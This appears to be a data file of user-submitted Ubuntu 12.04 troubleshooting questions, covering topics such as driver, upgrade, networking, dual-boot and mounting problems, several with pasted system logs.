125697	rebooted ubuntu 12.04 after installing nvidia driver . monitor now says 'out of range '	just to let you know before reading this . i am a complete ubuntu noob . after installing ubuntu 12.04 i installed the nvidia driver . it asked to be rebooted , so i did so . now when i power up my monitor says 'out of range ' . i can get the terminal using ctrl+alt+f1 while it says 'out of range ' . i 've logged in through the terminal and i 've tried typing the xrandr command thing but it says 'ca n't open display ' . also , every so often in the terminal it says something like this ... [ # # # . # # # # # # ] sd # : # : # : # : [ sbd ] assuming drive cache : write through [ # # # . # # # # # # ] sd # : # : # : # : [ sbd ] asking for cache data failed ^ not sure if that has anything to do with it . anyway , i appreciate any help . thanks !
125701	how can i tell if i am no longer using beta ?	is there a way to tell if i am still using beta after upgrading ? i 've been constantly upgrading my beta and i am , as far as i know , completely up to date . but , i ca n't really tell if i am up to date in terms of beta or 12.04 as a whole . is there a command i can run to check ?
125706	why does my usb mouse seem to randomly quit working ?	while i am doing stuff ... does n't seem to matter what , my usb mouse just stops working ... sometimes it will be the keyboard as well but usually not as often . ubuntu forces me to press my power button to recover my mouse again . any ideas ? let me know if you need more information . this is a dual boot system and only happens on ubuntu , and it works fine under windows
125709	dash not finding anything apart from music titles in 12.04	i have upgraded to 12.04 and have been happily using unity and dash in 11.10 . now however , my dash finds nothing apart from music titles ! !
125710	monitor turns off while installing 12.04	trying to install ( from usb ) ubuntu-12.04-desktop-amd64 , but monitor turns off after select install ubuntu on hard drive . pc keeps working . video is amd radeon hd 6790 and cpu - amd phenom ii x6 1075t sorry for my english . ps . with ubuntu-12.04-desktop-i386 i 've the same problem .
125711	ubuntu 12.04 installation failed	i 'm trying to install ubuntu 12.04 using live usb but getting error message that my cd or dvd drive lens is needed to be clean or i have burnt cd at higher speed . why i 'm facing this problem as i 'm using a live usb , how can i get through it . i want to install it on my hard disk .
125713	i need help with ubuntu and my xbox 360	i am trying to integrate my ubuntu system with my xbox 360 . does anybody knows an application ( like windows media center ) for that ?
125718	how can i stop terminal and firefox from launching on startup ?	hi everyone and first of all , thanks for your attention - i appreciate it ! here my problem . i 'm new to linux , although i 'm a web programmer so command line does n't look weird to me , and i 'm now running xubuntu . i have made several configurations and installations and it 's now working fine , except for this weird thing : terminal window and firefox browser are launching as soon as i log into my account . does anybody know how such thing could be happening ? i have rebooted several times , logged in/off as well , but both terminal and firefox window come up automatically every time i start a session . has anybody run into this before ? how can i find a solution to make those apps not start on startup ? thanks again ! hope someone can help me hehe
125722	why does eclipse 's `` check for updates '' not work	i just did a fresh install of 12.04 precise . in eclipse , if i do `` help '' > `` check for updates '' i see 8 packages which are grayed out with the message `` insufficient access privileges to apply this update . '' any idea how i fix this ?
125724	wireless suddenly dropping with a ralink rt2870	i have a linksys wusb600n v1 dual-band wireless-n network adapter ralink rt2870 usb dongle that worked flawlessly in 11.10 . since upgrading , i ca n't keep a connection for more than five minutes . the wild world of google was unable to provide a solution , and i would rather not downgrade although that remains a possibility . results of syslog : slack @ slack : ~ $ tail /var/log/syslog apr 26 20:26:10 slack aptdaemon : info : initializing daemon apr 26 20:26:10 slack aptdaemon.packagekit : info : initializing packagekit compat layer apr 26 20:26:10 slack dbus [ 972 ] : [ system ] successfully activated service 'org.freedesktop.packagekit' apr 26 20:26:10 slack aptdaemon.packagekit : info : initializing packagekit transaction apr 26 20:26:10 slack aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/aaed4e38eb3c41ad86d2bab6ca03ee7c apr 26 20:26:10 slack aptdaemon.worker : info : processing transaction /org/debian/apt/transaction/aaed4e38eb3c41ad86d2bab6ca03ee7c apr 26 20:26:12 slack dbus [ 972 ] : [ system ] activating service name='com.ubuntu.systemservice ' ( using servicehelper ) apr 26 20:26:12 slack dbus [ 972 ] : [ system ] successfully activated service 'com.ubuntu.systemservice' apr 26 20:30:26 slack aptdaemon.packagekit : info : get updates ( ) apr 26 20:30:27 slack aptdaemon.worker : info : finished transaction /org/debian/apt/transaction/aaed4e38eb3c41ad86d2bab6ca03ee7c any suggestions ?
125725	backing up to box.net account ( webdav and deja )	i have a box.net account and it 's feeling neglected so i decided to place my backups there since it 's bigger than my ubuntu one storage . when i try to set this up i get an error though . i set it up like this : backup location : webdav server : www.box.com/dav use https ( yes ) port 443 folder : /deja/ username : [ email address ] these are the same details used to add my box account as a server in nautilus ( which worked ) but this says `` http error : can not resolve hostname ( www.box.com/dav ) '' when i try to run a backup . any ideas ? cheers , james
125728	warning : root : file 'precise.tar.gz.gpg ' missing	firstly i tried to install the 12.04 upgrade via the update manager gui from 11.10 after there was no more updates to install and after a fresh reboot but all that would happen is it would say downloading release upgrade tool then that it is nothing else . so i tried running this from the terminal\command line brown @ brown-ubuntu : ~ $ update-manager -d brown @ brown-ubuntu : ~ $ do-release-upgrade checking for a new ubuntu release err upgrade tool signature connection failed get:1 upgrade tool [ 5612 kb ] fetched 5612 kb in 0s ( 0 b/s ) warning : root : file 'precise.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . can someone please help me out here .
125730	clicking unity launcher icon relaunches another instance of same app	i just installed the pgadmin3 package on an up-to-date ubuntu 12.04 installation . i thought pgadmin was repeatedly crashing , because i 'd switch to another window and then when i used the application switcher ( alt-tab ) , pgadmin was n't listed , and then when i clicked the launcher icon , the program started all over again . it took me a while to realize that i had multiple instances of pgadmin3 running ! i 'm guessing this problem is caused by bug ( s ) in pgadmin3 or something wrong in the launcher setup , but i looked at the pgadmin3.desktop file and compared it the .desktop file for an app that works fine and saw nothing suspicious . i realize that pgadmin3 is not a gnome app , but it is a gui app included with ubuntu and it should work with the default desktop ( unity , that is ) . thankfully , every instance of pgadmin does show up in the `` window spread '' ( super-w ) view . i guess for now i will have to adapt my habits to use super-w instead of alt-tab ( or clicking the active launcher icon ) . any ideas ? where should i file a bug ? under pgadmin3 , unity , or ... ?
125733	show all windows in 12.04	i have install new ubuntu 12.04 ( clear install ) but i have this issue with windows - when i wanted all windows to by shown , i just put cursor in left bottom corner as i set it up , but now , even though i set it up again in compiz manager - > scale , it shows me windows only from current workspace . any idea ?
125734	wine installation messed up unity ?	the exit , minimize , and window size buttons are gone ( for ubuntu main programs ) in the top left of screen and the entire black bar with the buttons when in windowed mode is gone .
125737	facebook pictures not showing up	i 'm using ubuntu 12.04 and facebook pictures are not showing up . i tried all browsers but still ca n't solve my problem . does someone have similar problem ? is there any way to fix this ?
125742	why did my upgrade to 12.04 fail with `` glibc not found '' or `` libc6 '' or `` requires kernel 2.6.24 '' error ?	i upgraded my server installation form 11.04 to 11.10 , then to 12.04 over ssh . all seems almost ok - but there is a small issue with glibc , which is messing up my apt . i tried sudo apt-get install -f but it does not get what it needs . i am running in a openvz virtual machine . how can i fix my apt dependencies ? sysadmin @ svr : ~ $ sudo apt-get update ign http : //archive.canonical.com precise inrelease ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-security inrelease get:1 http : //archive.ubuntu.com precise release.gpg [ 198 b ] hit http : //archive.canonical.com precise release.gpg get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //archive.canonical.com precise release get:3 http : //archive.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //archive.canonical.com precise/partner i386 packages get:4 http : //archive.ubuntu.com precise release [ 49.6 kb ] ign http : //archive.canonical.com precise/partner translationindex get:5 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] get:6 http : //archive.ubuntu.com precise-security release [ 49.6 kb ] get:7 http : //archive.ubuntu.com precise/main i386 packages [ 1274 kb ] ign http : //archive.canonical.com precise/partner translation-en get:8 http : //archive.ubuntu.com precise/restricted i386 packages [ 8431 b ] get:9 http : //archive.ubuntu.com precise/universe i386 packages [ 4796 kb ] hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:10 http : //archive.ubuntu.com precise-updates/main i386 packages [ 20.2 kb ] get:11 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 770 b ] get:12 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 2258 b ] get:13 http : //archive.ubuntu.com precise-updates/main translationindex [ 72 b ] get:14 http : //archive.ubuntu.com precise-updates/restricted translationindex [ 71 b ] get:15 http : //archive.ubuntu.com precise-updates/universe translationindex [ 72 b ] get:16 http : //archive.ubuntu.com precise-security/main i386 packages [ 11.8 kb ] get:17 http : //archive.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:18 http : //archive.ubuntu.com precise-security/universe i386 packages [ 1357 b ] get:19 http : //archive.ubuntu.com precise-security/main translationindex [ 72 b ] get:20 http : //archive.ubuntu.com precise-security/restricted translationindex [ 70 b ] get:21 http : //archive.ubuntu.com precise-security/universe translationindex [ 71 b ] hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en get:22 http : //archive.ubuntu.com precise-updates/main translation-en [ 9145 b ] hit http : //archive.ubuntu.com precise-updates/restricted translation-en get:23 http : //archive.ubuntu.com precise-updates/universe translation-en [ 1344 b ] get:24 http : //archive.ubuntu.com precise-security/main translation-en [ 3549 b ] hit http : //archive.ubuntu.com precise-security/restricted translation-en get:25 http : //archive.ubuntu.com precise-security/universe translation-en [ 760 b ] fetched 6279 kb in 57s ( 109 kb/s ) reading package lists ... done sysadmin @ svr : ~ $ sudo apt-get ugrade e : invalid operation ugrade sysadmin @ svr : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : depends : libc-bin ( = 2.13-20ubuntu5.1 ) but 2.15-0ubuntu10 is installed libncurses5 : depends : libtinfo5 ( = 5.9-1ubuntu5 ) but 5.9-4 is installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9 ) but 1.0.3-4ubuntu2 is installed e : unmet dependencies . try using -f. sysadmin @ svr : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libswscale0 libavutil50 python-support g++-4.5 libboost-program-options1.42.0 librpmio1 libpostproc51 libavformat52 libstdc++6-4.5-dev libavfilter1 libavcodec52 libboost-filesystem1.42.0 libboost-system1.42.0 libavdevice52 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc-dev-bin libc6 libc6-dev libncurses5 libnih1 suggested packages : glibc-doc the following packages will be upgraded : libc-dev-bin libc6 libc6-dev libncurses5 libnih1 5 upgraded , 0 newly installed , 0 to remove and 335 not upgraded . 2 not fully installed or removed . need to get 0 b/9099 kb of archives . after this operation , 1618 kb disk space will be freed . do you want to continue [ y/n ] ? locale : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by locale ) preconfiguring packages ... setting up libc-bin ( 2.15-0ubuntu10 ) ... ( reading database ... 31190 files and directories currently installed . ) preparing to replace libc6-dev 2.13-20ubuntu5.1 ( using ... /libc6-dev_2.15-0ubuntu10_i386.deb ) ... unpacking replacement libc6-dev ... preparing to replace libc-dev-bin 2.13-20ubuntu5.1 ( using ... /libc-dev-bin_2.15-0ubuntu10_i386.deb ) ... unpacking replacement libc-dev-bin ... preparing to replace libc6 2.13-20ubuntu5.1 ( using ... /libc6_2.15-0ubuntu10_i386.deb ) ... locale : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by locale ) checking for services that may need to be restarted ... checking init scripts ... runlevel : /var/run/utmp : no such file or directory checking for services that may need to be restarted ... checking init scripts ... runlevel : /var/run/utmp : no such file or directory warning : init script for samba not found . stopping some services possibly affected by the upgrade ( will be restarted later ) : cron : stopping ... done . warning : this version of the gnu libc requires kernel version 2.6.24 or later . please upgrade your kernel before installing glibc . the installation of a 2.6 kernel _could_ ask you to install a new libc first , this is not a bug , and should *not* be reported . in that case , please add lenny sources to your /etc/apt/sources.list and run : apt-get install -t lenny linux-image-2.6 then reboot into this new kernel , and proceed with your upgrade dpkg : error processing /var/cache/apt/archives/libc6_2.15-0ubuntu10_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 no apport report written because maxreports is reached already processing triggers for man-db ... locale : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by locale ) errors were encountered while processing : /var/cache/apt/archives/libc6_2.15-0ubuntu10_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sysadmin @ svr : ~ $
125744	issue with dualboot 12.04 and windows 7 ( with w7 loader )	i have windows 7 installed ( i install it first because for me it was always easier to have dual boot working ) and i want to install 12.04 ( i 've tried 11.10 and 11.04 and i have the same problem ) but i ca n't make dual boot works . when i install w7 , the installer create an additional partition with the loader ( i 'm not sure what is in this partition because other installers did n't create it ) so in sda1 is a small partition with the loader and in sda2 is the windows 7 partition . when i try to install ubuntu , i create a partition for the / directory , one for the /home and one for swap . after install ubuntu grub never starts and w7 starts automatically . i tried setting the sda1 ( while i am installing ubuntu ) as the boot directory but grub didnt recognize w7 ( and i could n't add it to grub ) . after reinstall w7 and ubuntu i tryg the clasic 'fix ' for grub the windows 7 loader keeps but showing a message that it is broken ( and that i must use the w7 disk to restore it ) . i hope someone has a solution for this , i search a lot but i ca n't found a solution . thanks
125748	given an existing lubuntu 11.10 system how do i upgrade to lubuntu 12.04 ?	how do i upgrade lubuntu from 11.10 to 12.04 ? how do i upgrade from 10.04 or 11.10 to 12.04 describes how to upgrade ubuntu . update manager has a `` new ubuntu release '12.04 lts ' is available '' `` upgrade '' button . lubuntu 12.04 images has a number of disk images . given an existing lubuntu 11.10 system how do i upgrade to lubuntu 12.04 ?
125750	12.04 , mapping network drive from windows server 2003	i 'm trying to map a network drive running on a windows server.. i tried using the connect to server gui but did n't get anywhere so i tried mounting it in the terminal but have had little success . basically here are the details of the server i am trying to connect to and what i have tried : ( in fstab ) server=10.26.136.12 share=8279 mountpoint=/home/jacobian/mystuff fs_type=cifs smb_credentials=/home/jacobian/.smbcredentials ( .smbcredentials ) username= [ domain ] / [ myusername ] password= [ mypassword ] when i try to mount using sudo mount -t cifs //10.26.136.12/8279 /home/jacobian/mystuff -o credentials=/home/jacobian/.smbcredentials i get mount error ( 13 ) permission denied . my credentials are correct because when i log into a windows machine and type \10.26.136.12\8279 and use [ myusername ] @ [ domain ] [ mypassword ] it connects and works correctly . any help with what i am doing wrong is greatly appreciated . i am trying to convert my work computer over to ubuntu and this is what makes or breaks it . thanks .
125751	ubuntu 12.04 lts 64-bit for intel core 2 duo laptop ?	i would like to download ubuntu 12.04 lts ( 64-bit ) . the iso file says `` ubuntu-12.040desktop-amd64.iso '' will it work with intel core2 duo laptop ?
125753	trouble making a live usb with debian 'sqeeze '	so first off , i 'm using debian sqeeze and i 'm trying to make an ubuntu 12 . 04 precise pangolin live usb . this is kind of a problem at the moment because debian does not have the `` startup disk creator '' app . so i looked through a number of debian forums and decided to try an app called unetbootin ( apparently it 's just about the only way i can make a live usb on squeeze ) . i downloaded the iso file for 12.04 , opened unetbootin and it extracted the files to the usb and everything was perfect . but when i reboot on my usb drive , the first thing on my screen is a unetbootin menu that only allows me to select `` default '' . after i press enter it just loads a command prompt that starts with `` ( initramfs ) : '' i ca n't figure out what i did wrong as i am a nub . any ideas or alternatives ?
125754	while during the upgrade , some errors occured , is it problematic ?	errors on these - x11-apps , xorg , ubuntu-desktop , bash-completion , console-setup , ubuntu-minimal are they important any way ? ( yes , i know ubuntu-desktop has to be important , but what 's with the other ? )
125755	is there a way to delete windows 7 from my harddisk without having to completely reinstall ubuntu ?	i had windows 7 installed on my machine , then installed ubuntu completely separate ( did n't use wubi ) , and now i would like to remove windows without erasing my harddisk and reinstalling ubuntu . is there a way to do this ? ( i am currently running ubuntu 12.04 )
125756	ubiquity crashes during install	so i have been trying to install 12.04 on my desktop since alpha 2 which is an old hp with 1 gig of ram an amd xp 2400+ and an nvidia geforce 5200 fx . the installer has always crashed at the same spot it crashes right as the slide show is supposed to start . and leaves my computer bricked . i figured it would be fixed by now for release but it has n't . i really want 12.04 just to use gnome classic but with new software .
125762	internet does n't work by default	after upgrading to precise , i am required to run 'sudo dhclient eth0 ' in a terminal in order to get the internet to work . everything worked perfectly fine on oneiric , so it 's really puzzling me . i 'm thinking it could possibly be something with the kernel , but who knows . output of dmesg : [ 0.247891 ] system 00:01 : [ io 0x0290-0x030f ] has been reserved [ 0.247896 ] system 00:01 : [ io 0x0290-0x0297 ] has been reserved [ 0.247901 ] system 00:01 : [ io 0x0880-0x088f ] has been reserved [ 0.247908 ] system 00:01 : plug and play acpi device , ids pnp0c02 ( active ) [ 0.247931 ] pnp 00:02 : [ dma 4 ] [ 0.247935 ] pnp 00:02 : [ io 0x0000-0x000f ] [ 0.247939 ] pnp 00:02 : [ io 0x0080-0x0090 ] [ 0.247943 ] pnp 00:02 : [ io 0x0094-0x009f ] [ 0.247947 ] pnp 00:02 : [ io 0x00c0-0x00df ] [ 0.248033 ] pnp 00:02 : plug and play acpi device , ids pnp0200 ( active ) [ 0.248125 ] pnp 00:03 : [ io 0x0070-0x0073 ] [ 0.248187 ] pnp 00:03 : plug and play acpi device , ids pnp0b00 ( active ) [ 0.248205 ] pnp 00:04 : [ io 0x0061 ] [ 0.248260 ] pnp 00:04 : plug and play acpi device , ids pnp0800 ( active ) [ 0.248277 ] pnp 00:05 : [ io 0x00f0-0x00ff ] [ 0.248292 ] pnp 00:05 : [ irq 13 ] [ 0.248348 ] pnp 00:05 : plug and play acpi device , ids pnp0c04 ( active ) [ 0.248583 ] pnp 00:06 : [ io 0x03f0-0x03f5 ] [ 0.248588 ] pnp 00:06 : [ io 0x03f7 ] [ 0.248597 ] pnp 00:06 : [ irq 6 ] [ 0.248601 ] pnp 00:06 : [ dma 2 ] [ 0.248690 ] pnp 00:06 : plug and play acpi device , ids pnp0700 ( active ) [ 0.248998 ] pnp 00:07 : [ io 0x03f8-0x03ff ] [ 0.249008 ] pnp 00:07 : [ irq 4 ] [ 0.249122 ] pnp 00:07 : plug and play acpi device , ids pnp0501 ( active ) [ 0.249479 ] pnp 00:08 : [ io 0x0400-0x04bf ] [ 0.249584 ] system 00:08 : [ io 0x0400-0x04bf ] has been reserved [ 0.249591 ] system 00:08 : plug and play acpi device , ids pnp0c02 ( active ) [ 0.249628 ] pnp 00:09 : [ mem 0xffb80000-0xffbfffff ] [ 0.249690 ] pnp 00:09 : plug and play acpi device , ids int0800 ( active ) [ 0.250049 ] pnp 00:0a : [ mem 0xe0000000-0xefffffff ] [ 0.250167 ] system 00:0a : [ mem 0xe0000000-0xefffffff ] has been reserved [ 0.250173 ] system 00:0a : plug and play acpi device , ids pnp0c02 ( active ) [ 0.250302 ] pnp 00:0b : [ mem 0x000f0000-0x000fffff ] [ 0.250307 ] pnp 00:0b : [ mem 0x7ff00000-0x7fffffff ] [ 0.250311 ] pnp 00:0b : [ mem 0xfed00000-0xfed000ff ] [ 0.250316 ] pnp 00:0b : [ mem 0x0000046e-0x0000056d ] [ 0.250320 ] pnp 00:0b : [ mem 0x7fee0000-0x7fefffff ] [ 0.250324 ] pnp 00:0b : [ mem 0x00000000-0x0009ffff ] [ 0.250328 ] pnp 00:0b : [ mem 0x00100000-0x7fedffff ] [ 0.250332 ] pnp 00:0b : [ mem 0xfec00000-0xfec00fff ] [ 0.250336 ] pnp 00:0b : [ mem 0xfed14000-0xfed1dfff ] [ 0.250341 ] pnp 00:0b : [ mem 0xfed20000-0xfed9ffff ] [ 0.250345 ] pnp 00:0b : [ mem 0xfee00000-0xfee00fff ] [ 0.250349 ] pnp 00:0b : [ mem 0xffb00000-0xffb7ffff ] [ 0.250353 ] pnp 00:0b : [ mem 0xfff00000-0xffffffff ] [ 0.250357 ] pnp 00:0b : [ mem 0x000e0000-0x000effff ] [ 0.250409 ] pnp 00:0b : disabling [ mem 0x0000046e-0x0000056d ] because it overlaps 0000:01:00.0 bar 6 [ mem 0x00000000-0x0007ffff pref ] [ 0.250419 ] pnp 00:0b : disabling [ mem 0x0000046e-0x0000056d disabled ] because it overlaps 0000:03:00.0 bar 6 [ mem 0x00000000-0x0000ffff pref ] [ 0.250430 ] pnp 00:0b : disabling [ mem 0x0000046e-0x0000056d disabled ] because it overlaps 0000:04:00.0 bar 6 [ mem 0x00000000-0x0001ffff pref ] [ 0.250524 ] system 00:0b : [ mem 0x000f0000-0x000fffff ] could not be reserved [ 0.250530 ] system 00:0b : [ mem 0x7ff00000-0x7fffffff ] has been reserved [ 0.250536 ] system 00:0b : [ mem 0xfed00000-0xfed000ff ] has been reserved [ 0.250541 ] system 00:0b : [ mem 0x7fee0000-0x7fefffff ] could not be reserved [ 0.250547 ] system 00:0b : [ mem 0x00000000-0x0009ffff ] could not be reserved [ 0.250552 ] system 00:0b : [ mem 0x00100000-0x7fedffff ] could not be reserved [ 0.250558 ] system 00:0b : [ mem 0xfec00000-0xfec00fff ] could not be reserved [ 0.250563 ] system 00:0b : [ mem 0xfed14000-0xfed1dfff ] has been reserved [ 0.250568 ] system 00:0b : [ mem 0xfed20000-0xfed9ffff ] has been reserved [ 0.250574 ] system 00:0b : [ mem 0xfee00000-0xfee00fff ] has been reserved [ 0.250579 ] system 00:0b : [ mem 0xffb00000-0xffb7ffff ] has been reserved [ 0.250585 ] system 00:0b : [ mem 0xfff00000-0xffffffff ] has been reserved [ 0.250590 ] system 00:0b : [ mem 0x000e0000-0x000effff ] has been reserved [ 0.250596 ] system 00:0b : plug and play acpi device , ids pnp0c01 ( active ) [ 0.250614 ] pnp : pnp acpi : found 12 devices [ 0.250617 ] acpi : acpi bus type pnp unregistered [ 0.250624 ] pnpbios : disabled by acpi pnp [ 0.288725 ] pci : max bus depth : 1 pci_try_num : 2 [ 0.288786 ] pci 0000:01:00.0 : bar 6 : assigned [ mem 0xfb000000-0xfb07ffff pref ] [ 0.288792 ] pci 0000:00:01.0 : pci bridge to [ bus 01-01 ] [ 0.288797 ] pci 0000:00:01.0 : bridge window [ io 0xa000-0xafff ] [ 0.288804 ] pci 0000:00:01.0 : bridge window [ mem 0xf8000000-0xfbffffff ] [ 0.288811 ] pci 0000:00:01.0 : bridge window [ mem 0xd0000000-0xdfffffff 64bit pref ] [ 0.288820 ] pci 0000:00:1c.0 : pci bridge to [ bus 02-02 ] [ 0.288825 ] pci 0000:00:1c.0 : bridge window [ io 0x9000-0x9fff ] [ 0.288833 ] pci 0000:00:1c.0 : bridge window [ mem 0xfdb00000-0xfdbfffff ] [ 0.288840 ] pci 0000:00:1c.0 : bridge window [ mem 0xfd800000-0xfd8fffff 64bit pref ] [ 0.288851 ] pci 0000:03:00.0 : bar 6 : assigned [ mem 0xfde00000-0xfde0ffff pref ] [ 0.288856 ] pci 0000:00:1c.4 : pci bridge to [ bus 03-03 ] [ 0.288861 ] pci 0000:00:1c.4 : bridge window [ io 0xd000-0xdfff ] [ 0.288869 ] pci 0000:00:1c.4 : bridge window [ mem 0xfd700000-0xfd7fffff ] [ 0.288876 ] pci 0000:00:1c.4 : bridge window [ mem 0xfde00000-0xfdefffff 64bit pref ] [ 0.288887 ] pci 0000:04:00.0 : bar 6 : assigned [ mem 0xfdc00000-0xfdc1ffff pref ] [ 0.288891 ] pci 0000:00:1c.5 : pci bridge to [ bus 04-04 ] [ 0.288897 ] pci 0000:00:1c.5 : bridge window [ io 0xb000-0xbfff ] [ 0.288904 ] pci 0000:00:1c.5 : bridge window [ mem 0xfdd00000-0xfddfffff ] [ 0.288911 ] pci 0000:00:1c.5 : bridge window [ mem 0xfdc00000-0xfdcfffff 64bit pref ] [ 0.288920 ] pci 0000:00:1e.0 : pci bridge to [ bus 05-05 ] [ 0.288926 ] pci 0000:00:1e.0 : bridge window [ io 0xc000-0xcfff ] [ 0.288933 ] pci 0000:00:1e.0 : bridge window [ mem 0xfda00000-0xfdafffff ] [ 0.288940 ] pci 0000:00:1e.0 : bridge window [ mem 0xfd900000-0xfd9fffff 64bit pref ] [ 0.288971 ] pci 0000:00:01.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.288979 ] pci 0000:00:01.0 : setting latency timer to 64 [ 0.288991 ] pci 0000:00:1c.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.288998 ] pci 0000:00:1c.0 : setting latency timer to 64 [ 0.289008 ] pci 0000:00:1c.4 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.289014 ] pci 0000:00:1c.4 : setting latency timer to 64 [ 0.289030 ] pci 0000:00:1c.5 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 0.289037 ] pci 0000:00:1c.5 : setting latency timer to 64 [ 0.289047 ] pci 0000:00:1e.0 : setting latency timer to 64 [ 0.289054 ] pci_bus 0000:00 : resource 4 [ io 0x0000-0x0cf7 ] [ 0.289058 ] pci_bus 0000:00 : resource 5 [ io 0x0d00-0xffff ] [ 0.289063 ] pci_bus 0000:00 : resource 6 [ mem 0x000a0000-0x000bffff ] [ 0.289067 ] pci_bus 0000:00 : resource 7 [ mem 0x000c0000-0x000dffff ] [ 0.289072 ] pci_bus 0000:00 : resource 8 [ mem 0x7ff00000-0xfebfffff ] [ 0.289077 ] pci_bus 0000:01 : resource 0 [ io 0xa000-0xafff ] [ 0.289081 ] pci_bus 0000:01 : resource 1 [ mem 0xf8000000-0xfbffffff ] [ 0.289086 ] pci_bus 0000:01 : resource 2 [ mem 0xd0000000-0xdfffffff 64bit pref ] [ 0.289092 ] pci_bus 0000:02 : resource 0 [ io 0x9000-0x9fff ] [ 0.289096 ] pci_bus 0000:02 : resource 1 [ mem 0xfdb00000-0xfdbfffff ] [ 0.289101 ] pci_bus 0000:02 : resource 2 [ mem 0xfd800000-0xfd8fffff 64bit pref ] [ 0.289106 ] pci_bus 0000:03 : resource 0 [ io 0xd000-0xdfff ] [ 0.289110 ] pci_bus 0000:03 : resource 1 [ mem 0xfd700000-0xfd7fffff ] [ 0.289115 ] pci_bus 0000:03 : resource 2 [ mem 0xfde00000-0xfdefffff 64bit pref ] [ 0.289120 ] pci_bus 0000:04 : resource 0 [ io 0xb000-0xbfff ] [ 0.289124 ] pci_bus 0000:04 : resource 1 [ mem 0xfdd00000-0xfddfffff ] [ 0.289129 ] pci_bus 0000:04 : resource 2 [ mem 0xfdc00000-0xfdcfffff 64bit pref ] [ 0.289134 ] pci_bus 0000:05 : resource 0 [ io 0xc000-0xcfff ] [ 0.289138 ] pci_bus 0000:05 : resource 1 [ mem 0xfda00000-0xfdafffff ] [ 0.289143 ] pci_bus 0000:05 : resource 2 [ mem 0xfd900000-0xfd9fffff 64bit pref ] [ 0.289148 ] pci_bus 0000:05 : resource 4 [ io 0x0000-0x0cf7 ] [ 0.289152 ] pci_bus 0000:05 : resource 5 [ io 0x0d00-0xffff ] [ 0.289157 ] pci_bus 0000:05 : resource 6 [ mem 0x000a0000-0x000bffff ] [ 0.289161 ] pci_bus 0000:05 : resource 7 [ mem 0x000c0000-0x000dffff ] [ 0.289166 ] pci_bus 0000:05 : resource 8 [ mem 0x7ff00000-0xfebfffff ] [ 0.289233 ] net : registered protocol family 2 [ 0.289360 ] ip route cache hash table entries : 32768 ( order : 5 , 131072 bytes ) [ 0.289754 ] tcp established hash table entries : 131072 ( order : 8 , 1048576 bytes ) [ 0.290351 ] tcp bind hash table entries : 65536 ( order : 7 , 524288 bytes ) [ 0.290670 ] tcp : hash tables configured ( established 131072 bind 65536 ) [ 0.290674 ] tcp reno registered [ 0.290680 ] udp hash table entries : 512 ( order : 2 , 16384 bytes ) [ 0.290703 ] udp-lite hash table entries : 512 ( order : 2 , 16384 bytes ) [ 0.290868 ] net : registered protocol family 1 [ 0.290911 ] pci 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 0.290932 ] pci 0000:00:1a.0 : pci int a disabled [ 0.290956 ] pci 0000:00:1a.1 : pci int b - > gsi 21 ( level , low ) - > irq 21 [ 0.290975 ] pci 0000:00:1a.1 : pci int b disabled [ 0.290992 ] pci 0000:00:1a.2 : pci int d - > gsi 19 ( level , low ) - > irq 19 [ 0.291012 ] pci 0000:00:1a.2 : pci int d disabled [ 0.291031 ] pci 0000:00:1a.7 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.291068 ] pci 0000:00:1a.7 : pci int c disabled [ 0.291104 ] pci 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.291123 ] pci 0000:00:1d.0 : pci int a disabled [ 0.291135 ] pci 0000:00:1d.1 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 0.291155 ] pci 0000:00:1d.1 : pci int b disabled [ 0.291166 ] pci 0000:00:1d.2 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 0.291185 ] pci 0000:00:1d.2 : pci int c disabled [ 0.291198 ] pci 0000:00:1d.7 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 0.291219 ] pci 0000:00:1d.7 : pci int a disabled [ 0.291258 ] pci 0000:01:00.0 : boot video device [ 0.291273 ] pci : cls 4 bytes , default 64 [ 0.291857 ] audit : initializing netlink socket ( disabled ) [ 0.291876 ] type=2000 audit ( 1336753420.284:1 ) : initialized [ 0.337724 ] highmem bounce pool size : 64 pages [ 0.337734 ] hugetlb registered 2 mb page size , pre-allocated 0 pages [ 0.349241 ] vfs : disk quotas dquot_6.5.2 [ 0.349365 ] dquot-cache hash table entries : 1024 ( order 0 , 4096 bytes ) [ 0.350418 ] fuse init ( api version 7.17 ) [ 0.350611 ] msgmni has been set to 1685 [ 0.351179 ] block layer scsi generic ( bsg ) driver version 0.4 loaded ( major 253 ) [ 0.351229 ] io scheduler noop registered [ 0.351233 ] io scheduler deadline registered [ 0.351247 ] io scheduler cfq registered ( default ) [ 